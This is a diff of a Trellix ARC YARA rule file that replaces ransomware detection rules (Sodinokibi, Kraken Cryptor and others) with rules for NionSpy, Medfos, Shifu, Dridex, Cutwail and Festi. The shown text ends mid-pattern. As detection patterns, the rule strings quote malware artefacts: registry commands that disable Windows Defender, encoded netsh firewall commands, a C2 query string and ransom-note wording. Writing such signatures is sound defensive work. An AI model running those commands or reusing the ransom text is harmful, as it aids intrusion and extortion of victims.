-		hash4 = "9b62f917afa1c1a61e3be0978c8692dac797dd67ce0e5fd2305cc7c6b5fef392"
 
 	strings:
-		$x1 = "sodinokibi.exe" fullword wide
-		$y0 = { 8d 85 6c ff ff ff 50 53 50 e8 62 82 00 00 83 c4 }
-		$y1 = { e8 24 ea ff ff ff 75 08 8b ce e8 61 fc ff ff 8b }
-		$y2 = { e8 01 64 ff ff ff b6 b0 }
+		$s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii
+		$s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide
+		$s3 = "C:\\Users\\file1.txt" fullword wide
+		$s4 = "C:\\Users\\file2.txt" fullword wide
+		$s5 = "C:\\Users\\file.txt" fullword wide
+		$s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide
+		$s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide
+		$s8 = "All your file has been locked. You must pay money to have a key." fullword wide
+		$s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and pe.imphash ( ) == "672b84df309666b9d7d2bc8cc058e4c2" and all of ( $y* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule TRELLIX_ARC_Sodinokobi : RANSOMWARE
+rule TRELLIX_ARC_Nionspy : FILEINFECTOR FILE
 {
 	meta:
-		description = "This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future."
-		author = "McAfee ATR team"
-		id = "dd05ce31-9699-50a9-944c-5883340791af"
-		date = "2026-02-01"
-		modified = "2025-03-18"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L32-L53"
+		description = "Triggers on old and new variants of W32/NionSpy file infector"
+		author = "Trellix ARC Team"
+		id = "86051ef8-a18b-553c-b06c-490f8d6df5cf"
+		date = "2026-03-01"
+		modified = "2020-08-14"
+		reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_NionSpy.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f25039ac743223756461bbeeb349c674473608f9959bf3c79ce4a7587fde3ab2"
+		logic_hash = "982ba52f39352aee9e2d2dcadfb0816c439e92d0e5947afa7860630720913742"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Sodinokibi"
+		tags = "FILEINFECTOR, FILE"
+		malware_type = "fileinfector"
+		malware_family = "FileInfector:W32/NionSpy"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		version = "1.0"
 
 	strings:
-		$a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }
-		$b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }
+		$variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT"
+		$variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1"
+		$variant2013_string = "%s?cstorage=shell&comp=%s"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $variant* )
 }
-rule TRELLIX_ARC_Ransom_Black_Kingdom : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Medfos : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect Black Kingdom ransomware that is spread using the latest Exchange vulns"
-		author = "McAfee ATR"
-		id = "c38e6dbf-7fb9-52f0-acd0-f824647b6041"
-		date = "2026-02-01"
-		modified = "2021-04-06"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/ransom_BlackKingDom.yar#L3-L49"
+		description = "Rule to detect Medfos trojan based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "07ad0227-ca8f-5071-8ef7-8c3e087fcc35"
+		date = "2013-04-19"
+		modified = "2020-08-14"
+		reference = "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=win32%2Fmedfos"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_medfos_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "334e84a9469367ed64509203feb61b5f64d5a7e38d29ff5c5089631246b06588"
-		score = 50
-		quality = 68
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/BlackKingdom_March2021"
+		hash = "3582e242f62598445ca297c389cae532613afccf48b16e9c1dcf1bfedaa6e14f"
+		logic_hash = "1726462a806f5cb3f0b80596623cebc51a7a9f866ded0cb59ea1c43034ce2819"
+		score = 75
+		quality = 70
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Medfos"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$0 = {7D3F634F627C5EC4D893189F1731F624A6AD458C3D89E9CB22C69EC4B4B588B1A7307D8963EC294C5B718C3D85692B8EB1A730732F8EB16F65EA5CEC17834A665E}
-		$1 = {3E774F2038FDE77377253CD11BFEB6FB82CF6A03E1B34E134C78A2CFDC1B7CD63AD167EE4E78A227FEF694EE3369143D1B0E84CF7CDAE7C3037C263DD15B979F}
-		$2 = {0C674D0A2427CDDD9B68213EC0B4A5DF94B19D39BEC0C562346FC7A1D32C0FA5BC9D963440910709A2365360650F5A909685912220EEC0F8157B3E2B95EA2CE9}
-		$3 = {7B7251266178C52BA731333F9E8A1C327A239FB81B901BAB2755FCAFD8A753F47991516A5C98A6CAAC9A1D5065DE565D87F120B3519DD91E09D353B7120EF9F2}
-		$4 = {2E233E25767037CA68F9C0F026A5CDDCC08FC0DCE21F61C612F1983A29BD3D986F8239A7692B0EBD478B6C8115564D5B0671346CF7CDDB612247EA7A4FAA7C71}
-		$5 = {2B2C3249094C8A1A9734E7515D10F78FD1B9339DF1902AC1D4ADE70C27C8A2CA7F3416B7B9F0D10E67519D589B8AD64D6435CC2DF4C2092A4BCEF7053B194AE5}
-		$6 = {0B297C7D79ECD339B30E87775B6769909CD886D1FBBAF2041DCC4FB11B5BA777AA626A9E8CAC14F64BEA5299A8E304A22BA25FA4F7AC4B95E8ACC42EC33A3DE4}
-		$7 = {0D46503D4DFD825DED41C94C055E1FCE1134C6F63AD80DCD7427F4BD502FA186077BD22653AB098C96ECDDA26557FB82BBA053CB2067C9DEA7EE0AF6A44C468A}
-		$8 = {2E774F2038FDE77277253CD11BFEB6FB82CB6A03E1B34E134C78A2CFDC1B5CD63AD167EE4E78A227FEF694EE3269143D1B0E84CF7CDAE5C3035C263DD15B979B}
-		$9 = {5C4250510A8DEF3463BF7410DEE0E72759B8A94A4D0544BD9B4FC0846E61844F4E06B779ABF906A450F5A2AC4C57CF761798C539175F092FD2429DC27909E382}
-		$10 = {7C787B386177B4D7F1F6B9E6FE17154FF15BD9E3F1DA94A1E1064654E7500A0B86A20A4AA16BD4E16F19A8733960DE868F10F382CDEEC1F15CE718839241DA10}
-		$11 = {2C3C6F6B2E597AC746FF7664087C7E899ABCC27AC60FA545D9CF4323063896D299F57132FE3E63E567EBFADF296365A1B2C0163DD8A4F3DABA04C77FA39A99CB}
-		$12 = {7B3C5D7C73D34D1A6C66B91990D162CACD89ECEAF591AC56C95AB3151EBAC1687FB749924B7BC27917FE50CA6C1417FEDBCC5BA2B7C03B1AEE4F5732E69DAC14}
-		$13 = {406357775C42584F11A1610D3A8A31F094FA252BC3E10738BD310D536D3A2F9EC5C21996AC4DCF5237AE3A4467D5678EE2983E4282ADFB1FDEA16352109BA7A7}
-		$14 = {2F265663680CACC66731B11AA78D588D7B54AC06C6348905D6B8F52C608D8208B0C6C5F1C11A2F69608D363DFA2A365AA387DAFCC906B486548F3DA8FE36312E}
-		$15 = {2B37480D634C799C468B775404368C7B891ADE3A556DF888566EB8CB3ED6F0171B59C35BB57F3B75D9017B7C9D52D1E87F48795AA58A16695B98BAFEAF66A769}
-		$16 = {0A76372D4F488ED5649A19B42E9E42B1DCC2E62655E7041711A6235B825D791CD6519492309D46964594F78B1DCAD17A5BEA574166B8A8EB76A52CA1052D724A}
-		$17 = {3D0B635F789C6CA6ADAC549548AA509C99D0C8DD823C99704423B90175B062E70EBBA67F937D622FF41B59D21E763A26D36759F3297D12B7454D82676C5B7B4A}
-		$18 = {225B642B7A09E7B06A4D3B95D97927AC46DABAE3ECE93AA4B307259DB9C01361C905B240678DB830EB7E172EB939ECB188ED3504B3709A746772B7BC94C83FB6}
-		$19 = {27465E49761EECAF449A3AB147907CF1C3D5F161D353E236BF9940AEC099EA4AC0352576803626029A15B3E978AB84D0024A1E345FFE58A81CDA2FBD61408971}
-		$20 = {3B7431210BEE4762B447DF044B5D6F41D53824C3E2CD17A35D71029352B47DA3811C60458EAADEBA532F75C54A3DDFC74AB3BEA7A51AF81A4A688F5D7A10378C}
-		$21 = {276C41453F8F2D8279980EAD3328E2478A3D84C55EB668231A12EED150E496622FCB2C04D9CBCE257BD97B9ECE404037589A185573F936A78DA88AD43EFC3948}
-		$22 = {2727495F5B1B4D920E35A52B6A5DB6A7F8B31A26873E20C53388696567D692B4B1F4A0B9267E4BBDA1728A5E883FD69029A07669AC1D0DC22E3157C028705C19}
-		$23 = {3E5552672C26C4F22824AF196F222D370F9EEDBEF119B8C3DD96414CF3529912234CB08AA7B2A034A51635319EAC44D47FA68747BA4B2FD2A884373ADEFB5C84}
-		$24 = {20735E632C6C70375BCA935EE39B7FA508205E9CC034CBD193A0D1C1E3A9A13818B9EB7FEFB11891E71221DB7143286C7D36A91C1FF7615E38F02E5C1BA24AFF}
-		$25 = {0A3D69344860D944AA8A46908019AB085E025AA693D381A34D8DCF116B25B0C62355D93893D1F64B983986C7E956C22303A9AB109680BF4B74460C5B087412AF}
-		$26 = {7C5B79652BC66C9BC36B11730D556FFA1CA1616CA59C0C344FD1F6B50C9C259329D699CDF0B894F1540AFDC4F431957206B0748AB6AE3B9069CD91147E09709B}
-		$27 = {2257442B42DB79A5E6CAD745E9A8D9775E4216C95F6094A05F05D7DAADBB03EC4B3444983DD291C2E32FC39299BCB4D22219386E75DAABB8D2EA93DFC52A248B}
-		$28 = {3C0D4A68792594D2F23F10A465B38B75D272318CA0E532A8A183F8CE5DEE6B45ECFDC96E4FF9158832472ED8CDFA69F92868A503F821D848CBB97B58332D8F84}
+		$pdb = "\\som\\bytguqne\\jzexsaf\\gyin.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-rule TRELLIX_ARC_Kraken_Cryptor_Ransomware_Loader : RANSOMWARE FILE
+rule TRELLIX_ARC_Shifu : FINANCIAL
 {
 	meta:
-		description = "Rule to detect the Kraken Cryptor Ransomware loader"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "e6bfa30b-6565-5d03-8f4d-96fc2b6a1c11"
-		date = "2018-09-30"
+		description = "No description has been set in the source file - Trellix ARC"
+		author = "McAfee Labs"
+		id = "81e9ad25-1df0-5196-be8b-1d1d5d8e4387"
+		date = "2026-03-01"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L1-L30"
+		reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Shifu.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
-		logic_hash = "9e252a3ba7f6bf861ea7563461a1420959dfb0f5b7c3f6071150d03422504539"
+		logic_hash = "dfa6165f8d2750330c71dedbde293780d2bb27e8eb3635e47ca770ff7b9a9d63"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Kraken"
+		tags = "FINANCIAL"
+		malware_type = "financial"
+		malware_family = "Backdoor:W32/Shifu"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "C:\\Users\\Krypton\\source\\repos\\UAC\\UAC\\obj\\Release\\UAC.pdb" fullword ascii
-		$s2 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide
-		$s3 = "public_key" fullword ascii
-		$s4 = "KRAKEN DECRYPTOR" ascii
-		$s5 = "UNIQUE KEY" fullword ascii
+		$b = "RegCreateKeyA"
+		$a = "CryptCreateHash"
+		$c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E}
+		$d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65}
+		$e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and $pdb or all of ( $s* )
+		all of them
 }
-rule TRELLIX_ARC_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Dridex_P2P_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the Kraken Cryptor Ransomware"
+		description = "Rule to detect Dridex P2P based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "7e1e5fa8-6d87-5e64-a8d4-4dae55ab76ca"
-		date = "2018-09-30"
+		id = "57350c96-877e-57de-9465-df9f7eb6d656"
+		date = "2014-11-29"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L32-L64"
+		reference = "https://www.us-cert.gov/ncas/alerts/aa19-339a"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dridex_p2p_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
-		logic_hash = "2ad7f0bf6110eab79e0f9541c49ae44089ebca3f91ffa80de874d60d5a7ed266"
+		hash = "5345a9405212f3b8ef565d5d793e407ae8db964865a85c97e096295ba3f39a78"
+		logic_hash = "c9c4db48435203cdb882eef8082efd8424bd13f1aa512cfb3082f365b9bc6e83"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Kraken"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Dridex"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "Kraken Cryptor" fullword ascii nocase
-		$s2 = "support_email" fullword ascii
-		$fw1 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
-		$fw2 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
-		$fw3 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
-		$fw4 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
-		$uac = "<!--<requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />-->   " fullword ascii
+		$pdb = "\\c0da\\j.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of ( $fw* ) or all of ( $s* ) or $uac
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Note_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Cutwail_Pdb : BOTNET FILE
 {
 	meta:
-		description = "Rule to detect the ransom note delivered by Kraken Cryptor Ransomware"
+		description = "Rule to detect cutwail based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "dec9d364-daf9-5a1d-8e72-ed4dd2aeecdf"
-		date = "2018-09-30"
+		id = "62058ff9-acb5-5f71-b6bb-4c64e51442ba"
+		date = "2008-04-16"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L66-L108"
+		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/CUTWAIL"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cutwail.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "d4acdf0716320b0f757b8dbc97bb9d407460b2d69dc8e12292539e823be0f57d"
+		hash = "d702f823eefb50d9ea5b336c638f65a40c2342f8eb88278da60aa8a498c75010"
+		logic_hash = "f53626e6085509ddf9268b69e54a138e64cd5d3fbad119e6e9473179decd7927"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Kraken"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Cutwail"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "No way to recovery your files without \"KRAKEN DECRYPTOR\" software and your computer \"UNIQUE KEY\"!" fullword ascii
-		$s2 = "Are you want to decrypt all of your encrypted files? If yes! You need to pay for decryption service to us!" fullword ascii
-		$s3 = "The speed, power and complexity of this encryption have been high and if you are now viewing this guide." fullword ascii
-		$s4 = "Project \"KRAKEN CRYPTOR\" doesn't damage any of your files, this action is reversible if you follow the instructions above." fullword ascii
-		$s5 = "https://localBitcoins.com" fullword ascii
-		$s6 = "For the decryption service, we also need your \"KRAKEN ENCRYPTED UNIQUE KEY\" you can see this in the top!" fullword ascii
-		$s7 = "-----BEGIN KRAKEN ENCRYPTED UNIQUE KEY----- " fullword ascii
-		$s8 = "All your files has been encrypted by \"KRAKEN CRYPTOR\"." fullword ascii
-		$s9 = "It means that \"KRAKEN CRYPTOR\" immediately removed form your system!" fullword ascii
-		$s10 = "After your payment made, all of your encrypted files has been decrypted." fullword ascii
-		$s11 = "Don't delete .XKHVE files! there are not virus and are your files, but encrypted!" fullword ascii
-		$s12 = "You can decrypt one of your encrypted smaller file for free in the first contact with us." fullword ascii
-		$s13 = "You must register on this site and click \"BUY Bitcoins\" then choose your country to find sellers and their prices." fullword ascii
-		$s14 = "-----END KRAKEN ENCRYPTED UNIQUE KEY-----" fullword ascii
-		$s15 = "DON'T MODIFY \"KRAKEN ENCRYPT UNIQUE KEY\"." fullword ascii
-		$s16 = "# Read the following instructions carefully to decrypt your files." fullword ascii
-		$s17 = "We use best and easy way to communications. It's email support, you can see our emails below." fullword ascii
-		$s18 = "DON'T USE THIRD PARTY, PUBLIC TOOLS/SOFTWARE TO DECRYPT YOUR FILES, THIS CAUSE DAMAGE YOUR FILES PERMANENTLY." fullword ascii
-		$s19 = "https://en.wikipedia.org/wiki/Bitcoin" fullword ascii
-		$s20 = "Please send your message with same subject to both address." fullword ascii
+		$pdb = "\\0bulknet\\FLASH\\Release\\flashldr.pdb"
 
 	condition:
-		uint16( 0 ) == 0x4120 and filesize < 9KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 440KB and any of them
 }
-rule TRELLIX_ARC_Netwalker_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Festi_Botnet_Pdb : BOTNET FILE
 {
 	meta:
-		description = "Rule to detect Netwalker ransomware"
-		author = "McAfee ATR Team"
-		id = "6fe75a64-77b8-5cb8-9365-a5336d4d1617"
-		date = "2020-03-30"
-		modified = "2020-11-20"
-		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L3-L28"
+		description = "Rule to detect the Festi botnet based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "02f4149d-b8ac-5852-8cbe-c47f4cddcba6"
+		date = "2013-03-04"
+		modified = "2020-08-14"
+		reference = "https://www.welivesecurity.com/2012/05/11/king-of-spam-festi-botnet-analysis/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_festi_botnet_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "11da4b57f8d9ed1fdf053053a51870af2cbf4062cc1340087ee70c3e92a1baf6"
+		hash = "e55913523f5ae67593681ecb28d0fa1accee6739fdc3d52860615e1bc70dcb99"
+		logic_hash = "46e2576900fe94d614a683d4f09079b7ac78654079b2e558d076bcb42db4bf11"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		note = "The rule doesn't detect the samples packed with UPX"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Festi"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 8B????8B????89??C7????????????EB??8B????52E8????????83????8B????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCC558B??83????C7????????????83??????74??83??????72??83??????75??8B????E9????????C7????????????8B????33??B9????????F7??83????89????8B????8B????8D????51E8????????83????89????83??????0F84????????C7????????????C7????????????C6??????C6??????C6??????8B????3B????0F84????????8B????2B????39????73??8B????89????EB??8B????2B????89????8B????89????C7????????????8B????03????8B????2B??89????74??83??????7E??83??????7D??C7????????????8B????03????89????8B????518B????03????528B????03????50E8????????83????8B????03????89????83??????75??6A??8D????528B????03????50E8????????83????8B????83????89????8B????03????89????E9????????8B????8B????89??83??????74??8B????52E8????????83????8B????89??C7????????????8B????8B??5DC3CCCCCCCC558B??51B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????81????????????75??8B????83????89????C7????????????EB??C7????????????B9????????6B????8B????0FB6????BA????????C1????8B????0FB6????C1????0B??B8????????D1??8B????0FB6????C1????0B??BA????????6B????8B????0FB6????C1????0B??BA????????C1????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FBE????BA????????C1????8B????0FBE????C1????0B??B8????????D1??8B????0FBE????C1????0B??BA????????6B????8B????0FBE????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????D1??8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????6B????8B????89????8B??5DC3CCCCCC558B??B8????????6B????8B????C7????????????B8????????6B????8B????C7????????????B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????5DC3CCCCCC558B??83????83??????75??E9????????8B????508D????51E8????????83????BA????????6B????8B????8B????83????B8????????6B????8B????89????B9????????6B????8B????83??????75??B9????????6B????8B????8B????83????BA????????6B????8B????89????83??????77??C7????????????EB??8B????83????89????8B????3B????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??EB??C7????????????EB??8B????83????89????83??????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??8B????83????89????8B????83????89????8B????83????89????E9????????8B??5DC3CCCCCCCCCCCCCCCC558B??83????C7????????????EB??8B????83????89????83??????7D??8B????8B????8B????8B????89??????EB??C7????????????EB??8B????83????89????83??????0F8E????????B9????????6B????B8????????C1????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????C1????BA????????C1????8B??????33??????C1????B9????????C1????BA????????C1????8B??????33??????C1????0B??BA????????C1????89??????B8????????6B????BA????????C1????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????C1????BA????????6B????8B??????03??????BA????????C1????89??????B8????????C1????B9????????C1????8B??????33??????C1????B8????????C1????B9????????C1????8B??????33??????C1????0B??B9????????C1????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????6B????B8????????C1????8B??????33??????C1????BA????????6B????BA????????C1????8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????C1????B9????????6B????8B??????03??????B9????????C1????89??????BA????????6B????B9????????C1????8B??????33??????C1????B8????????6B????B8????????C1????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B????B9????????6B????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????D1??BA????????6B????8B??????03??????BA????????D1??89??????B8??